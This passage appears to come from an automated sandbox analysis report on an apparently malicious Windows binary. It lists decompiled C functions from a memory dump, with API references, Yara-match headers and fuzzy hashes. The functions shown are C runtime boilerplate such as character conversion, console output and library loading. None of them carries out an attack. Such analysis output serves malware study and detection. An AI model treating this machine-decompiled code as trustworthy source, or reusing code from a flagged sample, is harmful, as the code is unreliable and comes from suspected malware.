                                                                                              				} else {
                                                                                              					_t93 = _t54 + _t54;
                                                                                              					_t83 = _t93 + 8;
                                                                                              					asm("sbb eax, eax");
                                                                                              					if((_t93 + 0x00000008 & _t54) == 0) {
                                                                                              						_t79 = 0;
                                                                                              						__eflags = 0;
                                                                                              						L14:
                                                                                              						if(_t79 == 0) {
                                                                                              							L36:
                                                                                              							_t103 = 0;
                                                                                              							L37:
                                                                                              							E004063D5(_t79);
                                                                                              							_t54 = _t103;
                                                                                              							goto L38;
                                                                                              						}
                                                                                              						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                                                                                              						_t119 = _t56;
                                                                                              						if(_t56 == 0) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						_t98 = _v12;
                                                                                              						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                                                                                              						_t103 = _t58;
                                                                                              						if(_t103 == 0) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						if((_a12 & 0x00000400) == 0) {
                                                                                              							_t94 = _t103 + _t103;
                                                                                              							_t85 = _t94 + 8;
                                                                                              							__eflags = _t94 - _t85;
                                                                                              							asm("sbb eax, eax");
                                                                                              							__eflags = _t85 & _t58;
                                                                                              							if((_t85 & _t58) == 0) {
                                                                                              								_t99 = 0;
                                                                                              								__eflags = 0;
                                                                                              								L30:
                                                                                              								__eflags = _t99;
                                                                                              								if(__eflags == 0) {
                                                                                              									L35:
                                                                                              									E004063D5(_t99);
                                                                                              									goto L36;
                                                                                              								}
                                                                                              								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                                                                                              								__eflags = _t60;
                                                                                              								if(_t60 == 0) {
                                                                                              									goto L35;
                                                                                              								}
                                                                                              								_push(0);
                                                                                              								_push(0);
                                                                                              								__eflags = _a28;
                                                                                              								if(_a28 != 0) {
                                                                                              									_push(_a28);
                                                                                              									_push(_a24);
                                                                                              								} else {
                                                                                              									_push(0);
                                                                                              									_push(0);
                                                                                              								}
                                                                                              								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                                                                                              								__eflags = _t103;
                                                                                              								if(_t103 != 0) {
                                                                                              									E004063D5(_t99);
                                                                                              									goto L37;
                                                                                              								} else {
                                                                                              									goto L35;
                                                                                              								}
                                                                                              							}
                                                                                              							_t88 = _t94 + 8;
                                                                                              							__eflags = _t94 - _t88;
                                                                                              							asm("sbb eax, eax");
                                                                                              							_t64 = _t58 & _t88;
                                                                                              							_t85 = _t94 + 8;
                                                                                              							__eflags = _t64 - 0x400;
                                                                                              							if(_t64 > 0x400) {
                                                                                              								__eflags = _t94 - _t85;
                                                                                              								asm("sbb eax, eax");
                                                                                              								_t99 = E00403E3D(_t85, _t64 & _t85);
                                                                                              								_pop(_t85);
                                                                                              								__eflags = _t99;
                                                                                              								if(_t99 == 0) {
                                                                                              									goto L35;
                                                                                              								}
                                                                                              								 *_t99 = 0xdddd;
                                                                                              								L28:
                                                                                              								_t99 =  &(_t99[4]);
                                                                                              								goto L30;
                                                                                              							}
                                                                                              							__eflags = _t94 - _t85;
                                                                                              							asm("sbb eax, eax");
                                                                                              							E004018E0();
                                                                                              							_t99 = _t105;
                                                                                              							__eflags = _t99;
                                                                                              							if(_t99 == 0) {
                                                                                              								goto L35;
                                                                                              							}
                                                                                              							 *_t99 = 0xcccc;
                                                                                              							goto L28;
                                                                                              						}
                                                                                              						_t68 = _a28;
                                                                                              						if(_t68 == 0) {
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						_t123 = _t103 - _t68;
                                                                                              						if(_t103 > _t68) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                                                                                              						if(_t103 != 0) {
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						goto L36;
                                                                                              					}
                                                                                              					asm("sbb eax, eax");
                                                                                              					_t70 = _t54 & _t93 + 0x00000008;
                                                                                              					_t83 = _t93 + 8;
                                                                                              					if((_t54 & _t93 + 0x00000008) > 0x400) {
                                                                                              						__eflags = _t93 - _t83;
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t79 = E00403E3D(_t83, _t70 & _t83);
                                                                                              						_pop(_t83);
                                                                                              						__eflags = _t79;
                                                                                              						if(__eflags == 0) {
                                                                                              							goto L36;
                                                                                              						}
                                                                                              						 *_t79 = 0xdddd;
                                                                                              						L12:
                                                                                              						_t79 =  &(_t79[4]);
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					asm("sbb eax, eax");
                                                                                              					E004018E0();
                                                                                              					_t79 = _t105;
                                                                                              					if(_t79 == 0) {
                                                                                              						goto L36;
                                                                                              					}
                                                                                              					 *_t79 = 0xcccc;
                                                                                              					goto L12;
                                                                                              				}
                                                                                              			}


























                                                                                              0x00407a7b
                                                                                              0x00407ab5
                                                                                              0x00407ab6
                                                                                              0x00000000
                                                                                              0x00407abb
                                                                                              0x00407a8f
                                                                                              0x00407a94
                                                                                              0x00407a96
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a9a
                                                                                              0x00407a9b
                                                                                              0x00407a9c
                                                                                              0x00407a9f
                                                                                              0x00407adb
                                                                                              0x00407ade
                                                                                              0x00407aa1
                                                                                              0x00407aa1
                                                                                              0x00407aa2
                                                                                              0x00407aa2
                                                                                              0x00407aaf
                                                                                              0x00407ab1
                                                                                              0x00407ab3
                                                                                              0x00407ae4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407ab3
                                                                                              0x00407a2d
                                                                                              0x00407a30
                                                                                              0x00407a32
                                                                                              0x00407a34
                                                                                              0x00407a36
                                                                                              0x00407a39
                                                                                              0x00407a3e
                                                                                              0x00407a59
                                                                                              0x00407a5b
                                                                                              0x00407a65
                                                                                              0x00407a67
                                                                                              0x00407a68
                                                                                              0x00407a6a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a6c
                                                                                              0x00407a72
                                                                                              0x00407a72
                                                                                              0x00000000
                                                                                              0x00407a72
                                                                                              0x00407a40
                                                                                              0x00407a42
                                                                                              0x00407a46
                                                                                              0x00407a4b
                                                                                              0x00407a4d
                                                                                              0x00407a4f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a51
                                                                                              0x00000000
                                                                                              0x00407a51
                                                                                              0x004079e7
                                                                                              0x004079ec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004079f2
                                                                                              0x004079f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a10
                                                                                              0x00407a14
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407a1a
                                                                                              0x0040794d
                                                                                              0x0040794f
                                                                                              0x00407951
                                                                                              0x00407959
                                                                                              0x00407978
                                                                                              0x0040797a
                                                                                              0x00407984
                                                                                              0x00407986
                                                                                              0x00407987
                                                                                              0x00407989
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040798f
                                                                                              0x00407995
                                                                                              0x00407995
                                                                                              0x00000000
                                                                                              0x00407995
                                                                                              0x0040795d
                                                                                              0x00407961
                                                                                              0x00407966
                                                                                              0x0040796a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407970
                                                                                              0x00000000
                                                                                              0x00407970

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                                                              • __alloca_probe_16.LIBCMT ref: 00407961
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                                                              • __alloca_probe_16.LIBCMT ref: 00407A46
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                                                              • __freea.LIBCMT ref: 00407AB6
                                                                                                • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              • __freea.LIBCMT ref: 00407ABF
                                                                                              • __freea.LIBCMT ref: 00407AE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3864826663-0
                                                                                              • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                              • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                                                                              • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                                              • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 72%
                                                                                              			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                              				signed int _v8;
                                                                                              				signed char _v15;
                                                                                              				char _v16;
                                                                                              				void _v24;
                                                                                              				short _v28;
                                                                                              				char _v31;
                                                                                              				void _v32;
                                                                                              				long _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				void* _v44;
                                                                                              				signed int _v48;
                                                                                              				signed char* _v52;
                                                                                              				long _v56;
                                                                                              				int _v60;
                                                                                              				void* __ebx;
                                                                                              				signed int _t78;
                                                                                              				signed int _t80;
                                                                                              				int _t86;
                                                                                              				void* _t93;
                                                                                              				long _t96;
                                                                                              				void _t104;
                                                                                              				void* _t111;
                                                                                              				signed int _t115;
                                                                                              				signed int _t118;
                                                                                              				signed char _t123;
                                                                                              				signed char _t128;
                                                                                              				intOrPtr _t129;
                                                                                              				signed int _t131;
                                                                                              				signed char* _t133;
                                                                                              				intOrPtr* _t136;
                                                                                              				signed int _t138;
                                                                                              				void* _t139;
                                                                                              
                                                                                              				_t78 =  *0x412014; // 0x8e1d7674
                                                                                              				_v8 = _t78 ^ _t138;
                                                                                              				_t80 = _a8;
                                                                                              				_t118 = _t80 >> 6;
                                                                                              				_t115 = (_t80 & 0x0000003f) * 0x30;
                                                                                              				_t133 = _a12;
                                                                                              				_v52 = _t133;
                                                                                              				_v48 = _t118;
                                                                                              				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                                                                                              				_v40 = _a16 + _t133;
                                                                                              				_t86 = GetConsoleCP();
                                                                                              				_t136 = _a4;
                                                                                              				_v60 = _t86;
                                                                                              				 *_t136 = 0;
                                                                                              				 *((intOrPtr*)(_t136 + 4)) = 0;
                                                                                              				 *((intOrPtr*)(_t136 + 8)) = 0;
                                                                                              				while(_t133 < _v40) {
                                                                                              					_v28 = 0;
                                                                                              					_v31 =  *_t133;
                                                                                              					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                                                                                              					_t123 =  *(_t129 + _t115 + 0x2d);
                                                                                              					if((_t123 & 0x00000004) == 0) {
                                                                                              						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                              							_push(1);
                                                                                              							_push(_t133);
                                                                                              							goto L8;
                                                                                              						} else {
                                                                                              							if(_t133 >= _v40) {
                                                                                              								_t131 = _v48;
                                                                                              								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                                                                                              								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                                                                                              								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                                                              							} else {
                                                                                              								_t111 = E00407222( &_v28, _t133, 2);
                                                                                              								_t139 = _t139 + 0xc;
                                                                                              								if(_t111 != 0xffffffff) {
                                                                                              									_t133 =  &(_t133[1]);
                                                                                              									goto L9;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t128 = _t123 & 0x000000fb;
                                                                                              						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                                                                                              						_push(2);
                                                                                              						_v15 = _t128;
                                                                                              						 *(_t129 + _t115 + 0x2d) = _t128;
                                                                                              						_push( &_v16);
                                                                                              						L8:
                                                                                              						_push( &_v28);
                                                                                              						_t93 = E00407222();
                                                                                              						_t139 = _t139 + 0xc;
                                                                                              						if(_t93 != 0xffffffff) {
                                                                                              							L9:
                                                                                              							_t133 =  &(_t133[1]);
                                                                                              							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                              							_v56 = _t96;
                                                                                              							if(_t96 != 0) {
                                                                                              								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                                                                                              									L19:
                                                                                              									 *_t136 = GetLastError();
                                                                                              								} else {
                                                                                              									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                                                                                              									if(_v36 >= _v56) {
                                                                                              										if(_v31 != 0xa) {
                                                                                              											goto L16;
                                                                                              										} else {
                                                                                              											_t104 = 0xd;
                                                                                              											_v32 = _t104;
                                                                                              											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                              												goto L19;
                                                                                              											} else {
                                                                                              												if(_v36 >= 1) {
                                                                                              													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                                                                                              													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                                                              													goto L16;
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					goto L20;
                                                                                              					L16:
                                                                                              				}
                                                                                              				L20:
                                                                                              				E004018CC();
                                                                                              				return _t136;
                                                                                              			}


                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                                                                              • __fassign.LIBCMT ref: 004082E0
                                                                                              • __fassign.LIBCMT ref: 004082FB
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                                                                              • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                                                                              • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                              • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                                                                              • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                                              • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 27%
                                                                                              			E00403632(void* __ecx, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _t10;
                                                                                              				int _t12;
                                                                                              				int _t18;
                                                                                              				signed int _t20;
                                                                                              
                                                                                              				_t10 =  *0x412014; // 0x8e1d7674
                                                                                              				_v8 = _t10 ^ _t20;
                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                              				_t12 =  &_v12;
                                                                                              				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                                                                                              				if(_t12 != 0) {
                                                                                              					_t12 = GetProcAddress(_v12, "CorExitProcess");
                                                                                              					_t18 = _t12;
                                                                                              					if(_t18 != 0) {
                                                                                              						E0040C15C();
                                                                                              						_t12 =  *_t18(_a4);
                                                                                              					}
                                                                                              				}
                                                                                              				if(_v12 != 0) {
                                                                                              					_t12 = FreeLibrary(_v12);
                                                                                              				}
                                                                                              				E004018CC();
                                                                                              				return _t12;
                                                                                              			}


                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                              • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                                                              • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                              • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 79%
                                                                                              			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                              				signed int _v8;
                                                                                              				int _v12;
                                                                                              				char _v16;
                                                                                              				intOrPtr _v24;
                                                                                              				char _v28;
                                                                                              				void* _v40;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				signed int _t34;
                                                                                              				signed int _t40;
                                                                                              				int _t45;
                                                                                              				int _t52;
                                                                                              				void* _t53;
                                                                                              				void* _t55;
                                                                                              				int _t57;
                                                                                              				signed int _t63;
                                                                                              				int _t67;
                                                                                              				short* _t71;
                                                                                              				signed int _t72;
                                                                                              				short* _t73;
                                                                                              
                                                                                              				_t34 =  *0x412014; // 0x8e1d7674
                                                                                              				_v8 = _t34 ^ _t72;
                                                                                              				_push(_t53);
                                                                                              				E00403F2B(_t53,  &_v28, __edx, _a4);
                                                                                              				_t57 = _a24;
                                                                                              				if(_t57 == 0) {
                                                                                              					_t52 =  *(_v24 + 8);
                                                                                              					_t57 = _t52;
                                                                                              					_a24 = _t52;
                                                                                              				}
                                                                                              				_t67 = 0;
                                                                                              				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                              				_v12 = _t40;
                                                                                              				if(_t40 == 0) {
                                                                                              					L15:
                                                                                              					if(_v16 != 0) {
                                                                                              						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                              					}
                                                                                              					E004018CC();
                                                                                              					return _t67;
                                                                                              				}
                                                                                              				_t55 = _t40 + _t40;
                                                                                              				_t17 = _t55 + 8; // 0x8
                                                                                              				asm("sbb eax, eax");
                                                                                              				if((_t17 & _t40) == 0) {
                                                                                              					_t71 = 0;
                                                                                              					L11:
                                                                                              					if(_t71 != 0) {
                                                                                              						E00402460(_t67, _t71, _t67, _t55);
                                                                                              						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                                                                                              						if(_t45 != 0) {
                                                                                              							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                                                                                              						}
                                                                                              					}
                                                                                              					L14:
                                                                                              					E004063D5(_t71);
                                                                                              					goto L15;
                                                                                              				}
                                                                                              				_t20 = _t55 + 8; // 0x8
                                                                                              				asm("sbb eax, eax");
                                                                                              				_t47 = _t40 & _t20;
                                                                                              				_t21 = _t55 + 8; // 0x8
                                                                                              				_t63 = _t21;
                                                                                              				if((_t40 & _t20) > 0x400) {
                                                                                              					asm("sbb eax, eax");
                                                                                              					_t71 = E00403E3D(_t63, _t47 & _t63);
                                                                                              					if(_t71 == 0) {
                                                                                              						goto L14;
                                                                                              					}
                                                                                              					 *_t71 = 0xdddd;
                                                                                              					L9:
                                                                                              					_t71 =  &(_t71[4]);
                                                                                              					goto L11;
                                                                                              				}
                                                                                              				asm("sbb eax, eax");
                                                                                              				E004018E0();
                                                                                              				_t71 = _t73;
                                                                                              				if(_t71 == 0) {
                                                                                              					goto L14;
                                                                                              				}
                                                                                              				 *_t71 = 0xcccc;
                                                                                              				goto L9;
                                                                                              			}

                                                                                              0x00406324
                                                                                              0x00406329
                                                                                              0x0040632b
                                                                                              0x0040632d
                                                                                              0x0040632d
                                                                                              0x00406335
                                                                                              0x00406352
                                                                                              0x0040635c
                                                                                              0x00406361
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406363
                                                                                              0x00406369
                                                                                              0x00406369
                                                                                              0x00000000
                                                                                              0x00406369
                                                                                              0x00406339
                                                                                              0x0040633d
                                                                                              0x00406342
                                                                                              0x00406346
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406348
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                                                              • __alloca_probe_16.LIBCMT ref: 0040633D
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                                                              • __freea.LIBCMT ref: 004063A9
                                                                                                • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                              • String ID:
                                                                                              • API String ID: 313313983-0
                                                                                              • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                              • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                                                              • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                              • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00409BDD(void* __eflags, signed int _a4) {
                                                                                              				intOrPtr _t13;
                                                                                              				void* _t21;
                                                                                              				signed int _t33;
                                                                                              				long _t35;
                                                                                              
                                                                                              				_t33 = _a4;
                                                                                              				if(E00405D6E(_t33) != 0xffffffff) {
                                                                                              					_t13 =  *0x4130a0; // 0x777e50
                                                                                              					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
                                                                                              						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
                                                                                              							goto L7;
                                                                                              						} else {
                                                                                              							goto L6;
                                                                                              						}
                                                                                              					} else {
                                                                                              						L6:
                                                                                              						_t21 = E00405D6E(2);
                                                                                              						if(E00405D6E(1) == _t21) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						L7:
                                                                                              						if(CloseHandle(E00405D6E(_t33)) != 0) {
                                                                                              							goto L1;
                                                                                              						}
                                                                                              						_t35 = GetLastError();
                                                                                              						L9:
                                                                                              						E00405CDD(_t33);
                                                                                              						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
                                                                                              						if(_t35 == 0) {
                                                                                              							return 0;
                                                                                              						}
                                                                                              						return E004047FB(_t35) | 0xffffffff;
                                                                                              					}
                                                                                              				}
                                                                                              				L1:
                                                                                              				_t35 = 0;
                                                                                              				goto L9;
                                                                                              			}

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                                                                                              • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                                                                                              • __dosmaperr.LIBCMT ref: 00409C68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                              • String ID: P~w
                                                                                              • API String ID: 2583163307-3961538373
                                                                                              • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                                                                                              • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                                                                                              • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                                                                                              • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E00405751(signed int _a4) {
                                                                                              				signed int _t9;
                                                                                              				void* _t13;
                                                                                              				signed int _t15;
                                                                                              				WCHAR* _t22;
                                                                                              				signed int _t24;
                                                                                              				signed int* _t25;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_t9 = _a4;
                                                                                              				_t25 = 0x412fc8 + _t9 * 4;
                                                                                              				_t24 =  *_t25;
                                                                                              				if(_t24 == 0) {
                                                                                              					_t22 =  *(0x40cd48 + _t9 * 4);
                                                                                              					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                              					if(_t27 != 0) {
                                                                                              						L8:
                                                                                              						 *_t25 = _t27;
                                                                                              						if( *_t25 != 0) {
                                                                                              							FreeLibrary(_t27);
                                                                                              						}
                                                                                              						_t13 = _t27;
                                                                                              						L11:
                                                                                              						return _t13;
                                                                                              					}
                                                                                              					_t15 = GetLastError();
                                                                                              					if(_t15 != 0x57) {
                                                                                              						_t27 = 0;
                                                                                              					} else {
                                                                                              						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                              						_t27 = _t15;
                                                                                              					}
                                                                                              					if(_t27 != 0) {
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						 *_t25 = _t15 | 0xffffffff;
                                                                                              						_t13 = 0;
                                                                                              						goto L11;
                                                                                              					}
                                                                                              				}
                                                                                              				_t4 = _t24 + 1; // 0x8e1d7675
                                                                                              				asm("sbb eax, eax");
                                                                                              				return  ~_t4 & _t24;
                                                                                              			}

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                                                              • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                              • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
